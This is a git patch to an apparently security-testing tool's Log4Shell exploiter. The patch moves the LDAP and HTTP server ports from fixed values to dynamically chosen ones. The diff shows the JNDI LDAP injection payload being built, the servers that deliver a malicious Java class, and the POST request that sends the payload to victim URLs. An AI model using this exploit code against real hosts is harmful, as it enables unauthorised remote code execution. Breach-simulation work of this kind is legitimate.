From 8a120110f5b65ae348b72ec8f715480a8a2e80eb Mon Sep 17 00:00:00 2001 From: vakarisz Date: Wed, 5 Jan 2022 12:04:21 +0200 Subject: [PATCH] Agent: change ldap and http ports to be chosen dynamically in log4shell --- monkey/infection_monkey/exploit/log4shell.py | 28 ++++++++----------- .../log4shell_utils/requests/poc_docker.py | 6 ++-- 2 files changed, 14 insertions(+), 20 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index 3d95e92d7..a8af38401 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -19,6 +19,7 @@ from infection_monkey.model import ( MONKEY_ARG, VictimHost, ) +from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.monkey_dir import get_monkey_dir_path @@ -30,13 +31,13 @@ class Log4ShellExploiter(WebRCE): _TARGET_OS_TYPE = ["linux", "windows"] EXPLOIT_TYPE = ExploitType.VULNERABILITY _EXPLOITED_SERVICE = "Log4j" - LDAP_PORT = 8080 - CLASS_HTTP_SERVER_PORT = 1337 DOWNLOAD_TIMEOUT = 15 def __init__(self, host: VictimHost): super().__init__(host) self._client = None + self.ldap_port = get_free_tcp_port() + self.class_http_server_port = get_free_tcp_port() def exploit_host(self): @@ -53,15 +54,13 @@ class Log4ShellExploiter(WebRCE): java_class = self.build_java_class(command) class_http_server_ip = get_interface_to_target(self.host.ip_addr) - java_class_http_thread = Log4ShellExploiter.get_java_class_server_thread( - class_http_server_ip, java_class - ) + java_class_http_thread = self.get_java_class_server_thread(class_http_server_ip, java_class) java_class_http_thread.start() ldap = LDAPExploitServer( - ldap_server_port=Log4ShellExploiter.LDAP_PORT, + ldap_server_port=self.ldap_port, http_server_ip=class_http_server_ip, - http_server_port=self.CLASS_HTTP_SERVER_PORT, + http_server_port=self.class_http_server_port, storage_dir=get_monkey_dir_path(), ) ldap_thread = ldap.get_run_thread() @@ -86,7 +85,7 @@ class Log4ShellExploiter(WebRCE): def build_ldap_payload(self): interface_ip = get_interface_to_target(self.host.ip_addr) - return f"${{jndi:ldap://{interface_ip}:{Log4ShellExploiter.LDAP_PORT}/dn=Exploit}}" + return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}" # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command def build_command(self, path, http_path): @@ -133,20 +132,15 @@ class Log4ShellExploiter(WebRCE): self.wfile.write(self.java_class) Log4ShellExploiter.HTTPHandler.class_downloaded = True - @staticmethod - def _run_class_http_server(ip): - - server = http.server.HTTPServer( - (ip, Log4ShellExploiter.CLASS_HTTP_SERVER_PORT), Log4ShellExploiter.HTTPHandler - ) + def _run_class_http_server(self, ip): + server = http.server.HTTPServer((ip, self.class_http_server_port), Log4ShellExploiter.HTTPHandler) while ( not Log4ShellExploiter.HTTPHandler.class_downloaded and not Log4ShellExploiter.HTTPHandler.stop ): server.handle_request() - @staticmethod - def get_java_class_server_thread(ip: str, java_class: bytes): + def get_java_class_server_thread(self, ip: str, java_class: bytes): Log4ShellExploiter.HTTPHandler.java_class = java_class - return Thread(target=Log4ShellExploiter._run_class_http_server, args=[ip]) + return Thread(target=self._run_class_http_server, args=[ip]) diff --git a/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py b/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py index 9743391a0..6ac59eb2b 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/requests/poc_docker.py @@ -13,9 +13,9 @@ def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]): payload = {"uname": payload, "password": "m0nk3y"} for url in urls: try: - requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 - except requests.ReadTimeout: - logger.debug("Couldn't send request to the vulnerable machine") + resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 + except requests.ReadTimeout as e: + logger.debug(f"Log4shell request failed {e}") def build_urls(open_ports: List[int], host: VictimHost) -> List[str]: